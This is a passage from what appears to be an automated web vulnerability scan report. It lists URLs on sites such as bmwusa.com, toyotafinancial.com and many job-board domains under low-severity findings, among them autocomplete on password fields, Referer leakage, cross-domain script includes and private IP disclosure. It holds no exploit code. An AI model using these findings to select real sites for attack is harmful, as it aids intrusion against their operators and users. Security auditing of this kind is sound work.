10.361. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx
10.362. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20
10.369. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx
10.370. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20
10.377. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx
10.378. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx%20
10.379. http://www.bmwusa.com/standard/content/vehicles/2011/x5/x5savexplorenew.aspx
10.380. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/default.aspx
10.385. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/default.aspx
10.389. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx
10.394. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx
10.398. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx
10.402. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx
10.403. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20
10.409. http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx
10.410. http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx
10.411. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx
10.415. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx
10.419. http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20
10.420. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx
10.421. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx
10.422. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/features_and_specs.aspx
10.425. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx
10.426. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/features_and_specs.aspx
10.429. https://www.bmwusa.com/ScriptResource.axd
10.430. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
10.431. https://www.bmwusa.com/Secured/FrameCheck.aspx
10.432. https://www.bmwusa.com/Secured/NaN
10.433. https://www.bmwusa.com/WebResource.axd
10.434. https://www.bmwusa.com/favicon.ico
10.435. https://www.bmwusa.com/jsenvconst.ashx
10.436. http://www.buyatoyota.com/NationalLanding.aspx
10.437. http://www.facebook.com/BMWUSA
10.438. http://www.facebook.com/EmploymentXing
10.439. http://www.facebook.com/pages/JD2B/298408284363
10.440. http://www.facebook.com/piyush.v.bhatt
10.441. http://www.facebook.com/profile.php
10.442. http://www.facebook.com/yahoonews
10.443. https://www.lowermybills.com/lending/home-refinance/
10.444. http://www.omniture.com/
10.445. http://www.toyotafinancial.com/consumer/tfs.portal
11. Password field with autocomplete enabled
11.1. http://www.100kcrossing.com/
11.2. http://www.accountingcrossing.com/
11.3. http://www.accountmanagementcrossing.com/
11.4. http://www.actuarialcrossing.com/
11.5. http://www.admincrossing.com/
11.6. http://www.advertisingcrossing.com/
11.7. http://www.aerospacecrossing.com/
11.8. http://www.agriculturalcrossing.com/
11.9. http://www.architecturecrossing.com/
11.10. http://www.attorneyresume.com/
11.11. http://www.attorneyresume.com/
11.12. http://www.auditorcrossing.com/
11.13. http://www.automotivecrossing.com/
11.14. http://www.aviationcrossing.com/
11.15. http://www.bilingualcrossing.com/
11.16. http://www.biotechcrossing.com/
11.17. http://www.bluecollarcrossing.com/
11.18. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
11.19. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
11.20. http://www.businessanalystcrossing.com/
11.21. http://www.businessdevelopmentcrossing.com/
11.22. http://www.callcentercrossing.com/
11.23. http://www.chefcrossing.com/
11.24. http://www.civilengineeringcrossing.com/
11.25. http://www.clevelcrossing.com/
11.26. http://www.clinicalresearchcrossing.com/
11.27. http://www.compliancecrossing.com/
11.28. http://www.computeraideddesigncrossing.com/
11.29. http://www.constructioncrossing.com/
11.30. http://www.consultingcrossing.com/
11.31. http://www.contractmanagementcrossing.com/
11.32. http://www.counselingcrossing.com/
11.33. http://www.cpluspluscrossing.com/
11.34. http://www.customerservicecrossing.com/
11.35. http://www.dbacrossing.com/
11.36. http://www.dentalcrossing.com/
11.37. http://www.designingcrossing.com/
11.38. http://www.diversitycrossing.com/
11.39. http://www.dotnetcrossing.com/
11.40. http://www.ecommercecrossing.com/
11.41. http://www.editingcrossing.com/
11.42. http://www.educationcrossing.com/
11.43. http://www.employmentcrossing.com/
11.44. http://www.energycrossing.com/
11.45. http://www.engineeringcrossing.com/
11.46. http://www.entrylevelcrossing.com/
11.47. http://www.environmentalcrossing.com/
11.48. http://www.environmentalsafetyhealthcrossing.com/
11.49. http://www.ericmmartin.com/projects/simplemodal/
11.50. http://www.erpcrossing.com/
11.51. http://www.execcrossing.com/
11.52. http://www.facebook.com/BMWUSA
11.53. http://www.facebook.com/EmploymentXing
11.54. http://www.facebook.com/pages/JD2B/298408284363
11.55. http://www.facebook.com/piyush.v.bhatt
11.56. http://www.facebook.com/plugins/likebox.php
11.57. http://www.facebook.com/yahoonews
11.58. http://www.facilitiescrossing.com/
11.59. http://www.financialservicescrossing.com/
11.60. http://www.foodservicescrossing.com/
11.61. http://www.fundraisingcrossing.com/
11.62. http://www.giscrossing.com/
11.63. http://www.governmentcrossing.com/
11.64. http://www.graduateschoolloans.com/
11.65. http://www.healthcarecrossing.com/
11.66. http://www.helpdeskcrossing.com/
11.67. http://www.hospitalitycrossing.com/
11.68. http://www.hrcrossing.com/
11.69. http://www.hvaccrossing.com/
11.70. http://www.informationtechnologycrossing.com/
11.71. http://www.insurcrossing.com/
11.72. http://www.intellectualpropertycrossing.com/
11.73. http://www.internshipcrossing.com/
11.74. http://www.j2eecrossing.com/
11.75. http://www.journalismcrossing.com/
11.76. http://www.lawcrossing.com/
11.77. http://www.lawcrossing.com/
11.78. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
11.79. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
11.80. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
11.81. http://www.lawcrossing.com/lcjssearchresults.php
11.82. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
11.83. http://www.lawschoolloans.com/
11.84. http://www.logisticscrossing.com/
11.85. http://www.managercrossing.com/
11.86. http://www.manufacturingcrossing.com/
11.87. http://www.marketingcrossing.com/
11.88. http://www.mediajobcrossing.com/
11.89. http://www.medicalschoolloans.com/
11.90. http://www.militarycrossing.com/
11.91. http://www.nursingcrossing.com/
11.92. http://www.occupationaltherapycrossing.com/
11.93. http://www.operationscrossing.com/
11.94. http://www.parttimecrossing.com/
11.95. http://www.pharmaceuticalcrossing.com/
11.96. http://www.physicalsecuritycrossing.com/
11.97. http://www.physicaltherapycrossing.com/
11.98. http://www.planningcrossing.com/
11.99. http://www.postdoctoralfellowcrossing.com/
11.100. http://www.prcrossing.com/
11.101. http://www.preferredresumes.com/
11.102. http://www.procurementcrossing.com/
11.103. http://www.productmanagercrossing.com/
11.104. http://www.projectmanagementcrossing.com/
11.105. http://www.publicinterestcrossing.com/
11.106. http://www.publishingcrossing.com/
11.107. http://www.purchasingcrossing.com/
11.108. http://www.qaqccrossing.com/
11.109. http://www.radiocrossing.com/
11.110. http://www.realestateandlandcrossing.com/
11.111. http://www.recruitingcrossing.com/
11.112. http://www.researchingcrossing.com/
11.113. http://www.resumeboomer.com/
11.114. http://www.resumeboomer.com/
11.115. http://www.retailcrossing.com/
11.116. http://www.sciencescrossing.com/
11.117. http://www.scientistcrossing.com/
11.118. http://www.sellingcrossing.com/
11.119. http://www.sqlcrossing.com/
11.120. http://www.teenagercrossing.com/
11.121. http://www.telecomcrossing.com/
11.122. http://www.toyota.com/owners/
11.123. http://www.tradingcrossing.com/
11.124. http://www.trainingcrossing.com/
11.125. http://www.transportationcrossing.com/
11.126. http://www.travelingcrossing.com/
11.127. http://www.truckingcrossing.com/
11.128. http://www.tvcrossing.com/
11.129. http://www.underwritingcrossing.com/
11.130. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
11.131. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
11.132. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
11.133. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
11.134. http://www.veterinarycrossing.com/
11.135. http://www.volunteercrossing.com/
11.136. http://www.woothemes.com/
11.137. http://www.workathomecrossing.com/
11.138. http://www.writingcrossing.com/
12. Referer-dependent response
12.1. http://www.facebook.com/plugins/like.php
12.2. http://www.facebook.com/plugins/likebox.php
13.5. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
14. Cross-domain Referer leakage
14.1. http://www.100kcrossing.com/
14.2. http://www.aharrisonbarnes.com/hb-course/
14.3. http://www.attorneyresume.com/
14.4. http://www.bcgsearch.com/
14.5. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
14.6. http://www.facebook.com/BMWUSA
14.7. http://www.facebook.com/plugins/like.php
14.8. http://www.facebook.com/plugins/like.php
14.9. http://www.facebook.com/plugins/likebox.php
14.10. http://www.facebook.com/plugins/likebox.php
14.11. http://www.feedburner.com/fb/a/emailverifySubmit
14.13. http://www.lawcrossing.com/
14.14. http://www.lawfirmstaff.com/
14.15. http://www.legalauthority.com/signup.php
14.16. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html
14.17. http://www.sourcewatch.org/index.php
14.18. http://www.toyota.com/Specials/specialOffersPage.aspx
14.19. http://www.toyota.com/owners/apps/maintenance-guides.do
14.20. http://www.toyota.com/owners/apps/manuals.do
14.21. http://www.toyotafinancial.com/consumer/tfs.portal
14.22. http://www.toyotafinancial.com/consumer/tfs.portal
14.23. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
14.24. http://www.velaw.com/lawyers/lawyersearch.aspx
15. Cross-domain script include
15.1. http://www.100kcrossing.com/
15.2. http://www.accountingcrossing.com/
15.3. http://www.accountmanagementcrossing.com/
15.4. http://www.actuarialcrossing.com/
15.5. http://www.admincrossing.com/
15.6. http://www.advertisingcrossing.com/
15.7. http://www.aerospacecrossing.com/
15.8. http://www.agriculturalcrossing.com/
15.9. http://www.aharrisonbarnes.com/
15.10. http://www.aharrisonbarnes.com/contact-us/script/functions.js
15.12. http://www.aharrisonbarnes.com/hb-course/
15.13. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
15.14. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen
15.15. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/ad.js
15.16. http://www.answers.com/topic/vinson-elkins-llp
15.17. http://www.architecturecrossing.com/
15.18. http://www.attorneyresume.com/
15.19. http://www.auditorcrossing.com/
15.20. http://www.automotivecrossing.com/
15.21. http://www.aviationcrossing.com/
15.22. http://www.bcgsearch.com/
15.23. http://www.bilingualcrossing.com/
15.24. http://www.biotechcrossing.com/
15.25. http://www.bluecollarcrossing.com/
15.26. http://www.bmwactivatethefuture.com/
15.28. http://www.bmwusa.com/default.aspx
15.30. http://www.bmwusa.com/standard/content/vehicles/2011/1/128iconvertible/default.aspx
15.34. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/default.aspx
15.36. http://www.bmwusa.com/standard/content/vehicles/2011/1/128icoupe/modelhighlights/default.aspx
15.38. http://www.bmwusa.com/standard/content/vehicles/2011/1/135iconvertible/default.aspx
15.42. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/default.aspx
15.44. http://www.bmwusa.com/standard/content/vehicles/2011/1/135icoupe/modelhighlights/default.aspx
15.45. http://www.bmwusa.com/standard/content/vehicles/2011/1/default.aspx
15.47. http://www.bmwusa.com/standard/content/vehicles/2011/3/328iconvertible/default.aspx
15.51. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/default.aspx
15.53. http://www.bmwusa.com/standard/content/vehicles/2011/3/328icoupe/modelhighlights/default.aspx
15.55. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/default.aspx
15.57. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isedan/modelhighlights/default.aspx
15.59. http://www.bmwusa.com/standard/content/vehicles/2011/3/328isportswagon/default.aspx
15.63. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivecoupe/default.aspx
15.68. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx
15.72. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx
15.77. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/default.aspx
15.79. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx
15.81. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/default.aspx
15.85. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/default.aspx
15.87. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx
15.89. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/default.aspx
15.93. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/default.aspx
15.98. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/default.aspx
15.102. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivecoupe/default.aspx
15.106. http://www.bmwusa.com/standard/content/vehicles/2011/3/335ixdrivesedan/default.aspx
15.109. http://www.bmwusa.com/standard/content/vehicles/2011/3/3convertibleexplorenew.aspx
15.110. http://www.bmwusa.com/standard/content/vehicles/2011/3/3coupeexplorenew.aspx
15.111. http://www.bmwusa.com/standard/content/vehicles/2011/3/3sedanexplore.aspx
15.112. http://www.bmwusa.com/standard/content/vehicles/2011/3/default.aspx
15.115. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx
15.116. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx%20
15.121. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/default.aspx
15.124. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx
15.127. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/default.aspx
15.132. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx
15.133. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20
15.138. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx
15.142. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/default.aspx
15.145. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/modelhighlights/default.aspx
15.148. http://www.bmwusa.com/standard/content/vehicles/2011/5/550isedan/default.aspx
15.153. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivegt/default.aspx
15.159. http://www.bmwusa.com/standard/content/vehicles/2011/5/550ixdrivesedan/default.aspx
15.164. http://www.bmwusa.com/standard/content/vehicles/2011/5/5explore.aspx
15.165. http://www.bmwusa.com/standard/content/vehicles/2011/5/5granturismoexplore.aspx
15.166. http://www.bmwusa.com/standard/content/vehicles/2011/5/default.aspx
15.168. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx
15.169. http://www.bmwusa.com/standard/content/vehicles/2011/7/740isedan/default.aspx%20
15.175. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx
15.176. http://www.bmwusa.com/standard/content/vehicles/2011/7/740lisedan/default.aspx%20
15.182. http://www.bmwusa.com/standard/content/vehicles/2011/7/750isedan/default.aspx
15.186. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx
15.187. http://www.bmwusa.com/standard/content/vehicles/2011/7/750ixdrivesedan/default.aspx%20
15.193. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lisedan/default.aspx
15.197. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx
15.198. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20
15.204. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/default.aspx
15.210. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx
15.211. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20
15.217. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx
15.218. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750li/default.aspx%20
15.223. http://www.bmwusa.com/standard/content/vehicles/2011/7/allnew7series.aspx
15.224. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx
15.225. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/alpinab7mediagallery.aspx%20
15.226. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx
15.227. http://www.bmwusa.com/standard/content/vehicles/2011/7/alpinab7/default.aspx%20
15.228. http://www.bmwusa.com/standard/content/vehicles/2011/7/default.aspx
15.229. http://www.bmwusa.com/standard/content/vehicles/2011/x3/default.aspx
15.230. http://www.bmwusa.com/standard/content/vehicles/2011/x3/x3savexplore.aspx
15.231. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx
15.232. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20
15.239. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx
15.240. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20
15.247. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx
15.248. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx%20
15.249. http://www.bmwusa.com/standard/content/vehicles/2011/x5/x5savexplorenew.aspx
15.250. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/default.aspx
15.255. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/default.aspx
15.259. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35ipremium/default.aspx
15.264. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35isportactivity/default.aspx
15.268. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx
15.272. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx
15.273. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20
15.279. http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx
15.280. http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx
15.281. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx
15.285. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx
15.289. http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20
15.290. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx
15.291. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx
15.294. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx
15.297. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx
15.298. http://www.businessanalystcrossing.com/
15.299. http://www.businessdevelopmentcrossing.com/
15.301. http://www.callcentercrossing.com/
15.302. http://www.chefcrossing.com/
15.303. http://www.civilengineeringcrossing.com/
15.304. http://www.clevelcrossing.com/
15.305. http://www.clinicalresearchcrossing.com/
15.306. http://www.codylindley.com/
15.307. http://www.compliancecrossing.com/
15.308. http://www.computeraideddesigncrossing.com/
15.309. http://www.constructioncrossing.com/
15.310. http://www.consultingcrossing.com/
15.311. http://www.contractmanagementcrossing.com/
15.312. http://www.counselingcrossing.com/
15.313. http://www.cpluspluscrossing.com/
15.316. http://www.customerservicecrossing.com/
15.317. http://www.dbacrossing.com/
15.318. http://www.dentalcrossing.com/
15.319. http://www.designingcrossing.com/
15.320. http://www.directstartv.com/
15.321. http://www.diversitycrossing.com/
15.322. http://www.dotnetcrossing.com/
15.323. http://www.ecommercecrossing.com/
15.325. http://www.editingcrossing.com/
15.326. http://www.educationcrossing.com/
15.327. http://www.employmentauthority.com/
15.328. http://www.employmentcrossing.com/
15.329. http://www.energycrossing.com/
15.330. http://www.engineeringcrossing.com/
15.331. http://www.entrylevelcrossing.com/
15.332. http://www.environmentalcrossing.com/
15.333. http://www.environmentalsafetyhealthcrossing.com/
15.334. http://www.ericmmartin.com/projects/simplemodal/
15.335. http://www.erpcrossing.com/
15.336. http://www.execcrossing.com/
15.337. http://www.facebook.com/BMWUSA
15.338. http://www.facebook.com/EmploymentXing
15.339. http://www.facebook.com/pages/JD2B/298408284363
15.340. http://www.facebook.com/piyush.v.bhatt
15.341. http://www.facebook.com/plugins/like.php
15.342. http://www.facebook.com/plugins/likebox.php
15.343. http://www.facebook.com/yahoonews
15.344. http://www.facilitiescrossing.com/
15.345. http://www.financialservicescrossing.com/
15.346. http://www.foodservicescrossing.com/
15.347. http://www.fundraisingcrossing.com/
15.348. http://www.giscrossing.com/
15.349. http://www.governmentcrossing.com/
15.350. http://www.graduateschoolloans.com/
15.351. http://www.healthcarecrossing.com/
15.352. http://www.helpdeskcrossing.com/
15.353. http://www.hospitalitycrossing.com/
15.354. http://www.hototc.com/
15.356. http://www.hrcrossing.com/
15.357. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html
15.359. http://www.huffingtonpost.com/2011/01/19/craziest-ways-to-pay-tuit_n_811038.html
15.360. http://www.hvaccrossing.com/
15.361. http://www.informationtechnologycrossing.com/
15.362. http://www.insurcrossing.com/
15.363. http://www.intellectualpropertycrossing.com/
15.364. http://www.internshipcrossing.com/
15.365. http://www.j2eecrossing.com/
15.366. http://www.journalismcrossing.com/
15.367. http://www.lawcrossing.com/
15.368. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/
15.369. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/
15.370. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/
15.371. http://www.lawcrossing.com/lcjssearchresults.php
15.372. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php
15.373. http://www.lawfirmstaff.com/
15.374. http://www.lawschoolloanreport.org/
15.375. http://www.lawschoolloans.com/
15.376. https://www.lawschoolloans.com/lslprivateloan_application.php
15.377. http://www.legalauthority.com/
15.378. http://www.legalauthority.com/signup.php
15.379. http://www.logisticscrossing.com/
15.380. http://www.managercrossing.com/
15.381. http://www.manufacturingcrossing.com/
15.382. http://www.marketingcrossing.com/
15.383. http://www.mediajobcrossing.com/
15.384. http://www.medicalschoolloans.com/
15.385. http://www.militarycrossing.com/
15.386. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/
15.387. http://www.nursingcrossing.com/
15.388. http://www.occupationaltherapycrossing.com/
15.389. http://www.opensource.org/licenses/gpl-license.php
15.390. http://www.opensource.org/licenses/mit-license.php
15.391. http://www.operationscrossing.com/
15.392. http://www.parttimecrossing.com/
15.393. http://www.pharmaceuticalcrossing.com/
15.394. http://www.physicalsecuritycrossing.com/
15.395. http://www.physicaltherapycrossing.com/
15.396. http://www.planningcrossing.com/
15.397. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html
15.398. http://www.postdoctoralfellowcrossing.com/
15.399. http://www.prcrossing.com/
15.400. http://www.preferredresumes.com/
15.401. http://www.procurementcrossing.com/
15.402. http://www.productmanagercrossing.com/
15.403. http://www.projectmanagementcrossing.com/
15.404. http://www.publicinterestcrossing.com/
15.405. http://www.publishingcrossing.com/
15.406. http://www.purchasingcrossing.com/
15.407. http://www.qaqccrossing.com/
15.408. http://www.radiocrossing.com/
15.409. http://www.realestateandlandcrossing.com/
15.410. http://www.recruitingcrossing.com/
15.411. http://www.researchingcrossing.com/
15.412. http://www.retailcrossing.com/
15.413. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114
15.414. http://www.sciencescrossing.com/
15.415. http://www.scientistcrossing.com/
15.416. http://www.sellingcrossing.com/
15.417. http://www.sourcewatch.org/index.php
15.418. http://www.sqlcrossing.com/
15.419. http://www.teenagercrossing.com/
15.420. http://www.telecomcrossing.com/
15.421. http://www.toyota.com/dealers/
15.422. http://www.toyota.com/ideas-for-good/
15.423. http://www.toyota.com/mobilepromo/
15.424. http://www.toyota.com/safety/
15.425. http://www.toyota.com/toyota-care/
15.426. http://www.tradingcrossing.com/
15.427. http://www.trainingcrossing.com/
15.428. http://www.transportationcrossing.com/
15.429. http://www.travelingcrossing.com/
15.430. http://www.truckingcrossing.com/
15.431. http://www.tvcrossing.com/
15.432. http://www.underwritingcrossing.com/
15.433. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
15.434. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP
15.435. http://www.veterinarycrossing.com/
15.436. http://www.volunteercrossing.com/
15.437. http://www.woothemes.com/
15.438. http://www.workathomecrossing.com/
15.439. http://www.writingcrossing.com/
17.1. http://www.aharrisonbarnes.com/
17.2. http://www.aharrisonbarnes.com/contact-us/script/functions.js
17.4. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/
17.5. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen
17.6. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/tabber.js
17.7. http://www.bcgsearch.com/searchresults.php
17.8. http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
17.9. http://www.bmwusa.com/JavaScript/s_code.js
17.10. https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
17.11. https://www.bmwusa.com/JavaScript/s_code.js
17.13. http://www.directstartv.com/
17.14. http://www.huffingtonpost.com/2011/01/05/david-koch-tea-party-republicans_n_804997.html
17.15. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html
17.16. http://www.intelliprice.com/intellipricedealer/start.htm
17.17. http://www.lawcrossing.com/
17.18. http://www.legalauthority.com/signup.php
17.19. http://www.msnbc.msn.com/id/41161439/ns/politics-more_politics/
17.20. http://www.opensource.org/licenses/gpl-license.php
17.21. http://www.opensource.org/licenses/mit-license.php
17.22. http://www.politico.com/blogs/onmedia/1210/Assanges_memoir_advance_tops_1_million.html
17.23. http://www.toyota.com/js/global/global.js
17.24. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/calendar.js
17.25. http://www.toyotafinancial.com/consumer/framework/skins/tfs/js/prototype.js
17.26. http://www.usatoday.com/money/world/2011-01-20-chinabuilding20_ST_N.htm
17.27. http://www.velaw.com/WorkArea/java/ektron.js
17.28. http://www.velaw.com/lawyers/DavidBlumental.aspx
17.29. http://www.velaw.com/lawyers/DavidDAlessandro.aspx
17.30. http://www.velaw.com/lawyers/JaneVris.aspx
17.31. http://www.velaw.com/offices/Dallas.aspx
17.32. http://www.velaw.com/offices/Houston.aspx
18. Private IP addresses disclosed
18.1. http://www.toyotafinancial.com/consumer/tfs.portal
18.2. https://www.toyotafinancial.com/consumer/tfs.portal
19.1. http://www.bilingualcrossing.com/
19.2. http://www.biotechcrossing.com/
19.3. http://www.bluecollarcrossing.com/
19.4. http://www.businessanalystcrossing.com/
19.5. http://www.businessdevelopmentcrossing.com/
19.6. http://www.callcentercrossing.com/
19.7. http://www.chefcrossing.com/
19.8. http://www.civilengineeringcrossing.com/
19.9. http://www.clevelcrossing.com/
19.10. http://www.clinicalresearchcrossing.com/
19.11. http://www.compliancecrossing.com/
19.12. http://www.computeraideddesigncrossing.com/
19.13. http://www.constructioncrossing.com/
19.14. http://www.consultingcrossing.com/
19.15. http://www.contractmanagementcrossing.com/
19.16. http://www.counselingcrossing.com/
19.17. http://www.cpluspluscrossing.com/
19.19. http://www.customerservicecrossing.com/
19.20. http://www.dbacrossing.com/
19.21. http://www.dentalcrossing.com/
19.22. http://www.designingcrossing.com/
19.23. http://www.diversitycrossing.com/
19.24. http://www.dotnetcrossing.com/
19.25. http://www.ecommercecrossing.com/
19.27. http://www.editingcrossing.com/
19.28. http://www.educationcrossing.com/
19.29. http://www.employmentauthority.com/
19.30. http://www.employmentcrossing.com/
19.31. http://www.energycrossing.com/
19.32. http://www.engineeringcrossing.com/
19.33. http://www.entrylevelcrossing.com/
19.34. http://www.environmentalcrossing.com/
19.35. http://www.environmentalsafetyhealthcrossing.com/
19.36. http://www.erpcrossing.com/
19.37. http://www.execcrossing.com/
19.38. http://www.facilitiescrossing.com/
19.39. http://www.financialservicescrossing.com/
19.40. http://www.foodservicescrossing.com/
19.41. http://www.fundraisingcrossing.com/
19.42. http://www.giscrossing.com/
19.43. http://www.governmentcrossing.com/
19.44. http://www.graduateschoolloans.com/
19.45. http://www.healthcarecrossing.com/
19.46. http://www.helpdeskcrossing.com/
19.47. http://www.hospitalitycrossing.com/
19.48. http://www.hrcrossing.com/
19.49. http://www.huffingtonpost.com/2011/01/12/sarah-palin-arizona-shooting-statement_n_807833.html
19.50. http://www.hvaccrossing.com/
19.51. http://www.informationtechnologycrossing.com/
19.52. http://www.insurcrossing.com/
19.53. http://www.intellectualpropertycrossing.com/
19.54. http://www.internshipcrossing.com/
19.55. http://www.j2eecrossing.com/
